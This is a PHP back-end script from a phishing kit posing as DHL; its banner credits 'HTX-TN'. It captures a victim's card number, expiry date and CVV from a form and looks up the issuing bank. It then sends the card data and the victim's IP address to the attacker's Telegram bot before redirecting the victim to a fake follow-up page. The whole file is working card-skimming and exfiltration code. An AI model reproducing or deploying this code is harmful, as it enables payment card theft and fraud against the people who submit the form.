<?php

error_reporting(0);
session_start();
include "../../config.php";
$ip = getenv("REMOTE_ADDR");
$link = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'] ;

$hostname = gethostbyaddr($ip);

$card = str_replace(' ', '', $_POST['ccnum']);
$_SESSION["card"]  = $card;

$name = str_replace(' ', '', $_POST['fullname']);
$_SESSION["name"]  = $name;






$bin = $_POST['ccnum'] ;
$bin = preg_replace('/\s/', '', $bin);
$bin = substr($bin,0,8);
$url = "https://lookup.binlist.net/".$bin;
$headers = array();
$headers[] = 'Accept-Version: 3';
$ch = curl_init();  
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$resp=curl_exec($ch);
curl_close($ch);
$xBIN = json_decode($resp, true);

$_SESSION['bank_name'] = $xBIN["bank"]["name"];
$_SESSION['bank_scheme'] = strtoupper($xBIN["scheme"]);
$_SESSION['bank_type'] = strtoupper($xBIN["type"]);
$_SESSION['bank_brand'] = strtoupper($xBIN["brand"]);
$_SESSION['bank_country'] = $xBIN["country"]["name"];

$message = "[========== ❄️ DHL FUCK3R RZLT BY HTX-TN (Card) ❄️ ===========]\r\n";
$message .= "|Card      	 : ".$_POST['ccnum']."\r\n";
$message .= "|DATE       : ".$_POST['ccexp']." / ".$_POST['yy']."\r\n";
$message .= "|Cvv       	 : ".$_POST['ccvv']."\r\n";
$message .= "|Bank Name          : ".$_SESSION['bank_name']."\r\n";
$message .= "|Card Type       	 : ".$_SESSION['bank_type']."\r\n";
$message .= "|Card Brand       	 : ".$_SESSION['bank_brand']."\r\n";
$message .= "|Card Country       	 : ".$_SESSION['bank_country']."\r\n";
$message .= "[========= $ip ========]\r\n";


file_get_contents("https://api.telegram.org/bot".$api."/sendMessage?chat_id=".$chatid."&text=" . urlencode($message)."" );


if ($sms=='1'){
HEADER("Location: ../loader.php?country.x=Global&one=ok&flowId=ul&_Email=data");
}else{
HEADER("Location: ../thank.php?country.x=Global&one=ok&flowId=ul&_Email=data");
}



?>